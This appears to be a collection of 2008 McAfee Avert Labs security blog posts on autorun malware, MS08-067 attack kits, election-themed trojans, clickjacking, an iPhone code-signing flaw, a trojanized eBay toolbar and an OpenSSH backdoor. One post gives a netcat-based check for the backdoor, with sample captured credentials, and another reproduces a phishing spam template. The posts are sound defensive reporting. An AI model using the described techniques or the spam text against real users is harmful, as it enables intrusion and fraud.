I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert labs

Earlier, my colleague Vinoo Thomas blogged about “The Rise in Autorun-Based Malware” and about a method employed to disable such malware from executing that uses the gpedit.msc tool.

I briefly want to add a couple of points to this:

The Group Policy Editor (gpedit.msc) is a tool provided by Microsoft, and is used to modify various system settings. One such setting is the ability to turn off the autoplay feature.

Changes made using this tool eventually get applied in the Windows registry. For example, when a user modifies settings related to autoplay using the group policy editor, it will be reflected in the following location in the registry:

HKEY_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Key: NoDriveTypeAutoRun

Now, here’s the interesting part. The Group Policy Editor is not available to users of Windows XP Home Edition. Those users would need to manually edit the registry or install TweakUI, a tool available in the PowerToys Suite, or download a third-party tool to do disable this feature.

Isn’t it odd that Microsoft makes a home user manually edit the registry to turn off this feature, yet it provides a tool for administrators using XP Professional?

I can understand the growing concern many are having with the use of removable devices. There has been a known bug in the NoDriveTypeAutoRun subkey value, which allows any changes made to this subkey to revert to its default value.

Of course, the default value enables the autoplay feature to function in all its glory.

All hope is not lost, though, as I managed to find a fix. Save the following text as a .reg file and import it into the registry. And, as always, remember to back up your registry before doing this.

REGEDIT4
[HKEY_Local_Machine\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]
@=”@SYS:DoesNotExist”

Apparently, this registry value prevents Windows from taking actions based on the Autorun.inf file.

If you are a McAfee Virus Scan customer, you could create a custom Access Protection Rule to disable the execution of files named autorun.inf. Many autorun worm variants are detected by McAfee asW32/Autorun.worm.dw.

Finally, Microsoft should implement this autorun feature (which is now exploited by malware) in a more efficient manner. My Ubuntu machine, which has Wine installed, can run Windows executables and has the same autoplay feature as Microsoft does, but with one BIG difference:

When a removable device with an autorun.inf file is inserted on my Ubuntu machine, it recognizes that the autorun.inf file is trying to run an executable and then asks for confirmation. Now, that’s what I call prioritizing the user’s security needs!!

Artemis was a Greek Goddess of hunt, forests and hills (http://en.wikipedia.org/wiki/Artemis). It is also a name for McAfee’s new “always-on,” real-time protection technology (http://www.mcafee.com/artemis) which is now available, without charge, in many of the latest McAfee products.

The legendary home of Greek Gods is the mount Olympus - the highest mountain in Greece.

Well, today Artemis reached another new level - I am very glad to let you know that VirusTotal (a free service run by Spanish company Hispasec through http://www.virustotal.com) have just added Artemis scanning to their portal. So, as of today, instead of just one command-line scanner, the basic detection technology from McAfee Avert Labs, we will be represented by two scanners. They are labeled “McAfee” and “McAfee+Artemis”. Here is how it looks in the VirusTotal portal:

Let us have a close look at this malware sample. We first saw it this morning at 06:35 UTC. Artemis recorded 32 instances of this file before it was analyzed and detection was added to Artemis. Since that moment and until now (~8 hours after first sighting) we saw 586 more samples. These samples, of course, were all successfully detected and blocked. The map shows geographical distribution of the Artemis clients that sent a fingerprint of this malware to the Avert servers.

White dots represent initial submissions (32 of them). Red dots - the blocked ones (586 of them).

Thanks to our colleagues at Hispasec for adding our Artemis technology to their site. This provides a great service to the public and to our Avert Labs researchers!

Most folks associate computer viruses and other prevalent malware with the Internet. Not quite. The earliest computer threats came from the era of floppy disks and removable media. However, with the arrival of the Internet, email and network based attacks became the preferred vector for hackers to spread malicious code and the issues with removable media took a back seat.

Over the years, floppy disks have since been replaced by thumb drives, portable hard drives, flash media cards and other forms of removable data storage. These removable devices of today can hold 10,000 times more data than yesteryears floppy disks. Not only can they store more data, today’s removal storage devices are smart with the ability to run portable software programs or boot an entire operating system.

Given the popularity of removable storage media, virus authors were quick to realize the potential of using this as an infection vector. And they are greatly aided by a convenience feature in operating systems called “Autorun” that exists to automagically launch the content in a removable disk without any user interaction.

McAfee Avert Labs has observed an alarming increase in malware using autorun as an infection vector. In addition to traditional autorun worms that used this feature, pure-play backdoors, password stealers, common Trojans and even parasitic viruses that previously required a user to double click an executable file in order to infect a system have started incorporating the autoplay technique to spread.

To give an example of how rampant the problem of autorun malware in the real world is, shown below is the McAfee global virus map which tracks statistics of infections observed by McAfee users world wide.

Generic!atr is a McAfee antivirus detection the for the configuration file (autorun.inf) where the path to the malware executable that needs to autoplay is specified. This detection is observed on over two million files in the last 24 hours and has always been in the top five detections globally ever since the signature was added to the McAfee DAT files. What is shown above are detections seen only on computers installed with McAfee antivirus, where those users have opted into reporting their detections. When you take in to account the millions of computers on the Internet and other vendor detections of autorun based threats, one understands how rampant the problem is.

Why is autorun as an infection vector so popular especially with machines running the Windows operating system? The fact is autorun is enabled by default on all flavors of Microsoft Windows including the latest versions of Windows Vista and Windows Server 2008. A user only has to insert a removable disk into an infected machine running Microsoft Windows and the malware would autocopy itself and infect the disk without any additional user interaction. And this self sustained cycle continues unabated every time the disk is inserted into a new machine.

So what can a user do to protect themselves against autorun based malware? The autorun feature can easily be disabled via the Windows group policy editor. If you’re a system administrator, it makes sense to disable autoplay via Active Directory and push this policy to the entire enterprise. Prevention is always better than drastic bans of USB disks & drives, although it makes you wonder why Microsoft can’t *fix* this ill-used feature in their next Windows update

The Apple iPhone is vulnerable to a new bug related to the signing of iPhone applications.  Applications that are created with the official iPhone SDK need to be cryptographically signed by the author and Apple before they’re allowed into the App store or installed on an iPhone.  The digital signing is a security measure that serves two purposes; helping to identify the developer in case of any problems and making sure that an approved application hasn’t been modified.

An iPhone developer discovered the bug while looking for a way to duplicate a feature of Apple created iPhone applications: dynamic default.png files.  The default.png file is displayed when an iPhone application is launched and can be used as a static splashscreen.  When you quit an Apple created application, it takes a snapshot of the screen when you quit and saves it as default.png within itself.  The next time you start the app it loads the new default.png, and everything looks like it was when it was last run. The application hasn’t fully loaded yet, but the saved default.png trick makes it look that way.

Unlike Apple’s apps, those created by other developers can’t modify their default.png files. Since the default.png is stored within the application as a part of itself, it gets digitally signed.  Modifying the image file and thus the app, makes the digital signature invalid.  An alternative would be to use a default.png in the application’s data directory, but only the file within the application is supported on the iPhone.

The method to replicate Apple’s default.png trick involves a defect in the codesign utility in the iPhone SDK.  codesign is the utility used by developers when they digitally sign their applications.  Normally codesign will take every file within an iPhone application into account when it creates the digital signature.  the problem with codesign is that it doesn’t handle symbolic links (symlinks) properly.

Symlinks are like shortcuts to files; if you want to refer to one file in two locations or with two different names you can create a symlink in the new location.  The symlink isn’t a new file copy, just a pointer to the original file.  codesign doesn’t follow the pointer to the original file, so it doesn’t consider that file during signing.  The new approach is to create a symlink named default.png that points to a location or file outside of the application that can be easily modified.

This is a neat trick, but harmless.  If it were only the codesign utility that has this symlink problem, then the technique would not work for an installed application.  The real trouble arises when symlinks are used to obscure other program files or components during signing.  The digital signature process was intended to ensure that no unapproved or unsafe modifications could occur.  An attacker could arrange for malicious components to be installed using a self-update feature.  Since the digital signature ignores symlinks, the malicious application could contain pointers to the yet to be downloaded parts.  Since the bad portions of the program don’t exist during the approval process, malicious applications can sneak through.  This effectively bypasses the iPhone OS’s protection against the running of malicious code.

Fortunately, since the application is signed, tracking down the author of such malware should be considerably easier.  Given that the vulnerability lies within a utility in the iPhone SDK and within the iPhone OS’s verification system, it should be fixed shortly in a future update.

Probably the most widely reported topic in the Chinese Security community this month will be the availability of a commercial MS08-067 attack pack, customized for Chinese users. On October 26th, 2008, exploit code was posted on to a well-known public repository site. In a few days, malware kit author, WolfTeeth, was quick to sell a MS08-067 port scanning tool with attack capability to his “customers”, using free code from the Internet.

Taking a peek into his “malware shop”, one finds a series of malware kits for sale - including a BackDoor kit (a.k.a. Beetle Remote Control Kit). It offers features similar to BackDoor-AWQ, another commercial kit that was also notoriously sold on a Chinese website. Both kits offers a free version, and a commercial version with enhanced features including:

• Kernel rootkit.
• Anti-virus software termination.
• Weekly anti-virus detection monitoring and evasion service.
• Web DDOS attack option (using a method to target webservers using expensive HTTP requests such as an active web application site).

The seller invites interested “customers” to contact him for a quote, but on another page, he has publicly priced a AdClicker trojan kit at CNY258 (~USD$37.80). This kit allows his “customers” to make money from pay-per-click sites using infected machines. Similarly, this kit claims “advanced” features to terminate popular anti-virus software in China, downloads updates and stealth capability.

Oh, wait, he also posted a disclaimer to remind all “customers” that his tools must never be used for “legal purposes” and is sold for “research use” only. For customer service, he has also warned his “customers” about “trojanized” versions of his kit distributed by others on the Internet, that will install a backdoor to spy on the backdoor user.

This malware shop is hosted on a domain registered very recently, on October 16th, 2008 to someone by the name of Wang Zeyu, possibly from Nanjing, China. Since the release of the tool, it has gained some attention from the mainstream Chinese media.

McAfee Avert Labs detects the toolkit as Exploit-MS08-067 (Generic.dx in older DATs), and the dropped exploit and port scanning tool as Exploit-MS08-067 trojan and Tool-TCP Scan application.

It is very exciting to see that finally AMTSO published two documents on its Website (http://www.amtso.org/documents/cat_view/13-amtso-principles-and-guidelines.html):

• AMTSO Fundamental Principles of Testing
• AMTSO Best Practices for Dynamic Testing

These documents were posted by AMTSO for public comments as RFC versions back in August 2008. Most of the comments from http://blog.amtso.org actually got reflected in the final text so AMTSO did incorporate many different opinions in its standards, which is a good thing!

The most important thing about these standards is that there is now hope that the quality of anti-malware reviews will improve over time because vendors and testers can work more closely together for the benefit of all computer users.

Here is what Jeff Green, Senior Vice President of McAfee Avert Labs said about this event: “While there have been many great security software reviews in the past, many poor reviews reviews have confused or misled people. We are glad to see that Anti-Malware Testing Standards Organization has taken this problem by the horns and formalized the principles of fair testing. This is a significant milestone that should skew the balance towards fair and scientific testing, providing users with a true viewpoint on the security protection vendors provide.”

Let’s hope that there will be more standards from AMTSO and they would look as good as those just published.

In this age of botnets, rootkits, spyware, and other bleeding-edge security threats, file infectors are frequently thought of as a dead threat. Yet we continue to see classic file-infecting viruses enjoy a high degree of success in the wild — causing widespread damage to computer systems. This inspired me to revisit traditional countermeasures used against file-infecting viruses and propose new approaches to improving existing systems.

Last month, I got to present my research on this subject at Malware 2008 - the 3rd International Conference on Malicious and Unwanted Software. The paper is titled “Combating File Infectors on Corporate Networks” and presented below is an extract from the paper:

“We regularly come across simple parasitic infectors that manage to infect every workstation and server on the network. And administrators are at their wits’ end trying to figure how the simplest of viruses managed to spread and infect every networked machine in so little time and with such stunning effect.

Administrators routinely attend to distress calls from hapless users whenever they have an issue with their workstations. And administrators typically tend to log onto the affected workstation using their own account—which has domain administrative credentials.

For a moment, let us assume the user whose workstation was acting weird was infected with a worm/virus. What could possibly go wrong from here?

Most worms routinely scan for any alive hosts on the network using ICMP or NetBIOS broadcasts and then attempt to connect to the administrative shares of the hosts they find, using the credentials of the currently logged-on user. If the initial login attempt using a regular user account fails, the worm attempts a brute-force attack on the admin account using a predefined list of hard-coded usernames and passwords. Because most corporations have enforced complex password policies these days, brute-forcing is hardly effective.

However, when an administrator logs to the affected machine using their domain admin account, the worm now runs on the affected machine using the elevated credentials of a domain administrator. Straight away the worm can now infect and spread to any host on the domain using these newly acquired administrative credentials. And in a matter of minutes the entire network with thousands of machines gets infected—by the dumbest of worms. And all this because an ignorant administrator committed the cardinal sin of logging into an infected machine using their own account.”

Interested readers can download a copy of the paper from the McAfee Avert Labs White Papers page.

Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both Campaigners were hacked during the summer [Security focus blog], I wanted to give you a short overview of the different Malware we saw here at McAfee Avert Labs during the US Presidential race.

Due to the high media attention which Barack Obama received, it seems that the Malware Authors specifically targeted him instead of John McCain as a means of luring users into clicking on the Malware.

One of the first pieces of malware we saw which exploited the campaign was in August. This was a spammed email which contained a link to get_flash_updates.exe . The email contained the subject “Obama bribes countrymen to win votes”, if the user followed the link it would download Get_Flash_updates.exe which was a BackDoor-DNM Trojan.

The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

A few weeks later we received a file called Obama_*.exe (I renamed the file due to it containing offensive language) which was detected as PWS-Banker.cs. The file used the Window Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also loaded a video in order to make the user believe that it was in fact a video file.

Yesterday we received a file named BarackObama.exe which Pedro blogged about [Election day is over]. We also went Low Profile on the Generic PWS.y!6F939359 which was being talked about on several different sites [Washington Post] [NetWork World]

Finally today we also received a new one which was named Beat_Obama_178.exe. This was a simple downloader which attempts to download a file from a Chinese website. This will be detected as Generic Downloader.Z in tomorrows Dat release.

We expect to see several more malicious files using the US Presidential election as a means of Social Engineering in order to trick users into executing them. So please be on the look out and keep your security software up to date.

So, election day is over and the United States has a new president-elect. For malware writers, however, the election is not over yet! Here at Avert Labs we are still seeing seasonal election malwares. An interesting one just arrived: It is called BarackObama.exe of all things. What’s more, it has a American flag icon! How patriotic is that?

It turns out this BarackObama.exe is actually the familiar PWS-Banker Trojan, which steals passwords and other user data about bank accounts and sends the information to the malware writer. Another interesting point is that the bank target is not an American bank, but a bank in Peru.

So, it doesn’t matter if you are a Democrat or Republican, the American election remains a nonpartisan opportunity for malware writers to get into your computer–using Barack Obama, John McCain, or even Ralph Nader.

I never thought I’d see the day!

ICANN found it’s dentures down the back of the sofa and taken a bite out of the criminals domain registration empire. ESTDomains will no longer be a registrar as of Nov 12th. [pdf]

So I’ve got a question… Who’s got the balls to take on ESTDomains problems “customers” ?

“ICANN Seeks Expressions of Interest from Registrars to Receive Bulk Transfer of Names from De-Accredited Registrar EstDomains”

I recently presented at APWG to encourage the anti-phishing community that registrars and registries can actually act rather than pleading innocence or the classic “our hands are tied” type excuses. In the case of fast-flux they are probably the only ones that can help in fact. I encouraged participants to point out that registrars and registries are guilty of acting illegally in many jurisdictions by facilitating illegal or infectious sites.

The general stance was that if Directi can clean them out then so can anyone else.

I pointed out that between 2 registrars (EST and Klik/Vivids) about $1.5M of revenue had taken place with Directi (who gives a healthy proportion of it to Verisign Etc…). I concluded with a slide to motivate participants to “Hug a Registrar” and I implore our readers to help out too. Anyone scoring over 30% on this uribl page is a prime candidate for advocates in the community to reach out and “help”.

So here is my top 5 for today:

#1 Moniker - Infested with spammers and pirated software sites. (MSOffice isn’t €79.95 delivered in a zip file)
#2 XIN NET - This is where the Pill spammers moved to and have given the .cn TLD a bad name.
#3 35 Tech & OnlineNic - Same as above but with more variety in pill sites and some casinos thrown in too.
#4 Planet Online - (Surprised to see them so high) Home of the unique URL “snowshoe” spammers ? almost legit ? The real world doesn’t care for their bulk and whois protected domains (via directi’s Logicboxes), or fake contacts.
#5 Dynamic Dolphin - Owned by Scott Ricter’s Media Breakaway, formerly bankrupted OptinRealBig . MS won cases against him in New York in 2005. This accreditation is probably against ICANN’s policy. These days they generally annoy via social networks.
#Bonus - *.directNIC [Mikko's open letter]

This is almost 2 years too late and took far too much media attention to shake their tree. The worst of the criminals left EST for other registrars after the “defecation meets the rotary oscillator” in August, but never the less, that (so I’m told) this is quick for ICANN

Hip Hip…

It has been over 2 years since I last wrote about malware exploitation of a major vulnerability in the Windows Server Service (MS06-040) by malware.

In 2006, worm authors were quick to adopt the remotely executed exploit in just 4 day following a security update released as part of the regular Patch Tuesdays - IRC-Mocbot, W32/Sdbot, W32/Spybot, W32/Opanki, et ceteras.

Now in 2008, we are faced with malware authors, motivated by profits, more organized, and are more likely to target zero-day vulnerabilities, as we have reported on several critical incidents we have discovered since 2006. Like déjà vu, Microsoft released an out-of-cycle security update today to address in-the-wild attacks against a new MS08-067 vulnerability targeting the same Windows Server Service.

Attacks seen in the wild so far seem to have come from variants of the Spy-Agent.da trojan. When run, it may not be immediately apparent to the victim that it was using any exploits. Taking a quick glimpse into the binary code of basesvc.dll (Spy-Agent.da.dll), one of the DLL components installed by Spy-Agent.da, one can see strings that would look very familiar to those familiar with MS06-040.

On closer analysis, Spy-Agent.da.dll seeks out potentially vulnerable Windows machines in the local network, and sends maliciously crafted DCERPC requests to exploit the Server Service (SvrSvc).

When successful, hardcoded shellcode embedded within the malware, is executed on the targeted machines to download Spy-Agent.da (or possibly other variants or files) from a web server hosted in Japan.

(shellcode after decoding)

Just hours following the patch release, public source code has already been seen distributing on the Internet. What more can I say ? Patch your systems ! Yes, NOW !

Spy-Agent.da and Spy-Agent.da.dll are now detected using the current 5414 DATs. See Dave’s blog for McAfee’s coverage.

(thanks to Joey Koo and Xiaobo Chen for providing analysis data and packet dumps used in this blog)

Due to the MS08-067 out-of-cycle release from Microsoft today we are in the process of releasing emergency DATs/coverage updates for many of our products and technologies. We are also working on an emergency Security Advisory as well.

Current state for each of the content areas is as follows:

Malware - Emergency DAT cut and testing in progress. ETA of 2 - 3 hours.

HIPS - Generic buffer overflow should provide coverage.

Intrushield - Partial existing coverage. Additional emergency sigset releasing today.

Foundstone - Emergency signatures being released today.

V-Flash - Emergency signatures being released today.

MNAC - Emergency signatures being released today.

VirusScan Enterprise BOP - Should provide coverage for the buffer overflow.

We will continue to monitor this critical event to provide the most comprehensive coverage we can.

[This entry was updated on November 3.]

Lately, the topic of “clickjacking” has gained popularity in discussions on the Internet. It is a new type of web attack. I decided to find out what it’s all about.

I found an online video from OWASP NYC AppSec 2008 here. In the video, Jeremiah Grossman and Robert “RSnake” Hansen reported this new vulnerability in a presentation titled “New Zero-Day Browser Exploits-–ClickJacking.” I also found a demo of this attack here.

In the videos they describe only parts of the vulnerability, but we can learn enough to gain a basic idea of what clickjacking is.

To explain, I’ll use an example. You have a web page A controlled by an attacker. A contains an IFRAME element B. In a clickjack attack, B would be set to transparent and the z-index property of the layer set to higher than other elements of page A via cross-site scripting. The area of B will also need to be so big that the user can easily click its content. The attacker places a button in B that leads to any action he wants. Then the attacker places some buttons on page A that will attract users. The location of the buttons in B must match the buttons in A so when users appear to click a button on page A, they are actually clicking the button in B because the z-index property of B’s buttons are higher than A’s buttons. This attack uses DHTML and does not require JavaScript, so disabling JavaScript will not help.

This vulnerability affects multiple web browsers. Unfortunately, no patch for it is currently available, so users should be careful. The vulnerability has also been found to affect Adobe Flash Player, the most popular rich-media Internet application today. Adobe has released a security advisory and provided a workaround.

We will continue to watch for new information about this vulnerability.

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 - What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

News about the Artemis project has been out for a little while. As the rollout continues we want to post some of juicy backstage gossip here, making you some of the first people to see this outside of the core project team!

If you’ve not heard about the Artemis technology yet, it’s our “in-the-cloud”-based malware detection; head over to the McAfee Artemis micro-site. I highly recommend the podcast (hidden on the right-hand side) as my colleague Dimitry Gryaznov outtalks our communications guru Dave Marcus.

One of the things Artemis provides to researchers is very clear telemetry on active malware campaigns, and I want to share a few interesting examples. All the “measles maps” below show a one-day period and were all taken at the same time earlier today.

First up is today’s typical ecard malware:

As you might expect, there are lots of hits all around the globe, sent very quickly. [Take note ISP's: You're the first line of defense and you delivered this to our users.]

This is a previous ecard campaign from a week ago:

(There’s always one.) This isn’t saying that the campaign is over and protection is no longer required. Since Artemis gets queries only for those without current detection in the DATs, this simply means that the map shows endpoint(s) that need to update.

Sex (still) sells. The current “tits.exe” campaign:

This picture looked like the first one on Friday. Protection is relatively new for this threat and we’re seeing the queries tail off as customers update. This is exactly the point of Artemis, providing protection for new threats between updates, and efficiently, too. (I’ve no idea why this one appears to be more popular in Australia.)

This is the current data from the “tits.exe” campaign from last weekend (21 September):

Yes it’s a blank map. In fact, the last query was at 00:45 on 25 September from an ISP in California. This is quite a revelation: Artemis fills a gap far wider than I first envisaged.

Dimitry’s podcast also explains how we are able to deploy Artemis without an upgrade and that Artemis has been dormant in the DATs for quite a few months already. Those on the Artemis-enabled beta programs have been enjoying its added protection for months as well.

A quick note about privacy before the vultures circle. The dots on the map roughly represent ISPs rather than individual users (we couldn’t read it otherwise). We use the data purely on a statistical basis and we don’t keep it longer than we need to. The dots are geolocated by a service that has well-understood accuracy “limits,” so relax. Artemis does not know where you live, or what color the car on your driveway is. For that, you need to ask Google; they have pictures of it. Artemis queries are short checksums or fingerprints. Those wishing to disable Artemis should unplug themselves from the Internet at this point. It’s far easier to track our blog readers, for instance.

Some other trivia about Artemis:

• Queries are not sent for every file, just the suspicious ones.
• It will probably be invisible in the consumer products. (It’s a special driver.)
• A query and a response is around 340 bytes.
• It’s checksum/fingerprint independent, too.
• Actionable responses are cryptographically strong.
• Telemetry can be used to prioritize sample processing.
• Today Artemis should gain about 1.5 million new users.

Enterprise customers, please feel free to call Platinum Support if you want to test out Artemis early.

Lastly, any malware authors who want free third-party real-time telemetry on their campaigns should contact us ASAP! Our legal hounds are waiting to take your calls.

YouTube is an excellent resource for video sharing: Users can upload, view, and share video clips. It’s also not novel to find a legitimate web site being used as a vector to spread porn-spewing malware. We blogged earlier about fake video embedded in blogspot domains and attackers capitalizing on sensational news hitting the media. This time attackers are promising free adult video on YouTube to assault unsuspecting users.

Attackers are using fake profiles that contain a video link to YouTube to kick-start an infection. This profile contains a link pointing to:

http://superelection[blocked].info

The preceding web site is infamous for various U.S.-election-related spam and hosts a cocktail of exploits that attempt a drive-by installation on the victim’s machine. The site also attempts to social engineer the victim by promoting a fake codec that installs the Puper Trojan. We have identified multiple profiles connecting to various exploit-serving sites hosting the fake codec. The attackers have been successful in promoting this attack by posting the YouTube links to various forums. With numerous visits to this YouTube link so far, the chances are good that a number of users have fallen victim to this attack.

We advise all Internet users to follow safe browsing practices and keep their systems patched. Meanwhile we at McAfee Avert Labs will continue to protect our customers against such attacks.

In a recent email to the Full-Disclosure mailing list there’s an interesting article that grabbed our attention. This email talks about how a hacking team claims to have compromised some Linux-based computers and have successfully installed OpenSSH backdoors.

It’s evident that the attackers probably obtained root access by a SSH-password brute-force attack, leveraging the infamous Debian OpenSSL Package Random Number Generator Weakness (CVE-2008-0166) vulnerability. According to the email, after installing this OpenSSH backdoor, the backdoor is capable of recording all information about user accounts, passwords, and IP addresses connecting to and from this host. Hence by social engineering tricks, the attackers can gather the sensitive system information of even more hosts that connect to the compromised machine. At the end of the report this team also lists some achievements they gained, some of which is information on compromised computers.

We have some suggestions for administrators to verify whether they’ve been compromised:

– First compare your devices to check whether any of these are in the records. Note: This list might not be exhaustive; thus even if your host is not present, we recommend you continue to the following steps.

– Use this command to determine whether SSHD on the host has been replaced:

echo netdump|nc localhost 22 or echo netdomp|nc localhost 22

It should output the following information if the backdoor has been installed:

SSH-2.0-OpenSSH_4.3
netdump
SSH2_OUT: 127.0.0.1 user: root pass: password (localhost)


– By using commands such as “strings /pathto/sshd | grep netdump” you can verify whether the backdoor is currently installed and is working.

– And of course, the most effective method is to have all the latest patches installed. If the system is a Debian flavor, you should definitely confirm that the OpenSSL Weakness (CVE-2008-0166) patch has been installed.

– We also suggest the use of public-key-based authentication rather than just a password-authentication mechanism.

We’ll continue to monitor this threat and will update you with more information as it becomes available.

When I see my son playing online computer games I am worried!

I am worried not because he spends too much time in front of a computer - it is the abundance of security issues that surround contemporary online gaming that makes me uneasy. I just had to do something about that.

So what I have tried to do is list the security problems related to online games and humbly suggest some possible solutions. The result is a research white paper that has just been posted on our Web site:

 http://www.mcafee.com/us/local_content/white_papers/threat_center/wp_online_gaming.pdf.

If you are interested in topics like game-related money-laundering, virtual terrorist attacks, stolen virtual identities, game-related malware, virtual viral outbreaks - I dare you NOT to click the link!

The growth of computer attacks that steal user data is disturbing. The graph below shows this alarming trend. What is probably not commonly known is that approximately 40-50% of these attacks specifically target online gamers!

A recent story about a gaming malware that infiltrated the International Space Station is a good indication how serious the problem actually is.

I do believe that most attacks on virtual life can be rendered impossible or uneconomical. Equipped with our current knowledge in security there are no good reasons why our children and their virtual avatars should suffer inside the games from spam, phishing, adware, spyware, Trojans, viruses, worms, and other malware— all those bugbears that currently plague our real day-to-day lives.

One of the issues that we’ve been highlighting at our recent conference presentations and blogs was the emergence of major localized threats around Asia. McAfee Avert Labs discovered yet another unidentified vulnerability in the Japanese word processor , Ichitaro, last Friday.

This Japanese application have been known to be under the targeted attacks for several years and a few 0-day vulnerabilities were discovered and exploited in the past. Other than Ichitaro, other popular and localized applications are often targeted by 0-day exploits. We also frequently observe exploits targeting vulnerabilities, even months after they have already been patched by the vendor.

Users should continue to stay vigilant of any suspicious email attachments, and do not open unknown files. Please be sure to update your applications, whether it is popular or not, with the latest security patches to protect you and your organization from the known attacks.

These newly crafted malicious documents are detected as Exploit-TaroDrop.e trojan, and the payload as BackDoor-DRZ trojan in the 5368 DATs.

The vendor has acknowledge the vulnerability and will be posting a patch.

We received a sample recently from a customer. Its file name, ToolbarSetup.exe, implies it may be toolbar installer. Upon execution, it displays the eBay toolbar EULA and the installation interface. And this program does indeed install the eBay toolbar.

However, something grabbed my attention during the installation. Besides the 2ebaytoolbarsetup.exe process, the program also created the wscript.exe process and ran .vbs files–that is not common for the toolbar installation. So I looked into every file dropped by the installer. Then something caught my eye. Besides the dozens of legit eBay toolbar components, there was a file named startup.exe. Unlike the toolbar components, this file had no version information. So I ran it in my test environment, and it generated a few batch and Visual Basic script files. The image below shows one of the generated .vbs files.

This file silently opens TCP port 3389, which is by default the port for Terminal Services. It creates a new account–”eBayMember”–with Administrator privileges and enables this account to remotely access the infected machine. The created account is also hidden from login screen, to prevent the victim from noticing.

Then the remote access ability of the compromised machine was verified by using the user name and password defined in the malicious .vbs file, as illustrated below. A successful login suggests the infected machine could be completely controlled by a remote attacker.

Still feel safe downloading and installing toolbars from untrusted sources? Attackers can take advantage.

An independent security research firm has announced several new mobile Java (J2ME) security vulnerabilities. Two of the vulnerabilities affect the Java virtual machine (JVM) on mobile phones, and the other 14 are specific to Nokia Series 40 phones. Series 40 mobiles are not Symbian smartphones and run only J2ME MIDlets.

The reported vulnerabilities and exploits in the JVM could allow the running of untrusted Java MIDlets. After using those vulnerabilities, relatively recent phones running S40, 3rd edition are open to malicious MIDlets that exploit the others.

According to the researchers the vulnerabilities allow:

• gaining additional privileges for a malicious MIDlet, even manufacturer or mobile carrier level
• running a malicious MIDlet when the phone is first turned on
• accessing files
• sending SMS/MMS
• making phone calls
• reading your contacts
• accessing the SIM card
• eavesdropping using the camera and microphone

Java phones used to be affected by malware such as J2ME/Redbrowser or J2ME/Wesbe,r which cause just premium rate charges. This is the first time that such phones have been vulnerable to more malicious malware.

The security research company has produced a report of more than 170 pages on the vulnerabilities and a number of proof of concept(PoC) exploits. Usually when researchers develop PoC code or malicious samples, they provide them directly to the security research community. In this case, the researchers are asking for €20,000 (about $30,000) for early access to the research and malware. After the release of vulnerability information, attackers will generally attempt to write exploits.

(Photos are taken from the slideshow attached to the Trojan)

With all the press coverage the Beijing’s Olympics is currently receiving, it doesn’t surprise us that malware authors are using it as a way of spreading their parasites. Today around the time of the opening ceremony we received a sample in the Aylesbury research lab, which proclaimed to be a set of images which showed the amazing architectural feats of the venues.

While viewing the slideshow your machine would be infected by a classic BackDoor-CKB. The original dropper [executable] which tried to imitate a PowerPoint presentation icon, copies 81.dll and wuauct.exe and launches a PowerPoint slideshow to disguise its background activity. The server which the backdoor communicates with appears to be located in the city of Henan (in the region of Shanxi, China).

We want to reiterate to all our readers to be vigilant and cautious while checking emails that attempt to attract attention to high-profile events. If you do receive any suspicious emails, please find details on how to submit a sample here. We wish all your countries the best of luck in the competition

OMG, undetectable Trojans are coming to get us! At least that’s what a story in The Register says, referring to Limbo 2.

Or else we’ve just found further evidence of the “AV software is for catching unknown threats” myth.

Malware authors selling “guaranteed undetected” Trojans is not news; it’s been happening since developing Trojans was first motivated by money. The Trojan authors test their creations against freely available AV scanners, and if it’s undetected at that moment, it qualifies as “undetected.” However, that doesn’t mean that they will always remain detected. Or that another type of security product won’t detect it, such as a firewall or network intrusion prevention system.

One amusing example of malware for sale included an end-user license agreement that promised violators would be reported to AV companies so your botnet could be dismantled.

But I digress.

The point is that “undetectable Trojans” implies that some novel method of storing the malware code on the system is being employed, such that security software (and likewise the operating system) is incapable of seeing it. Limbo 2 does no such thing. It’s a simple PWS-Banker Trojan as far as security software is concerned. I find it disappointing that a security company would describe it otherwise–that smacks of FUD to me.

In other news, this will be my last post for the Avert Labs blog. As of next week, I’ll be the Director of Research for West Coast Labs. Thank you all for reading and commenting on my posts throughout the years. Hearing your opinions has been the most entertaining part of being a blogger!

Last night we blogged about fake invoice spam carrying malware.  Unsurprisingly those behind the recent attacks continued today with new spam campaigns involving airline ticket invoices.  Messages may appear as follows (other spam campaigns may appear different):

—————————–
From: [name] [airline_name] Airlines
Subject: Your order from {airlines} [number]
   or
Subject: Online order for flight ticket [number]
Body:

Hello,
Thank you for using our new service “Buy airplane ticket Online” on our website.
Your account has been created:

Your login: [characters]
Your password: [characters]

Your credit card has been charged for $[number in the $400 range]
We would like to remind you that whenever you order tickets on our website you get a discount of 10%!
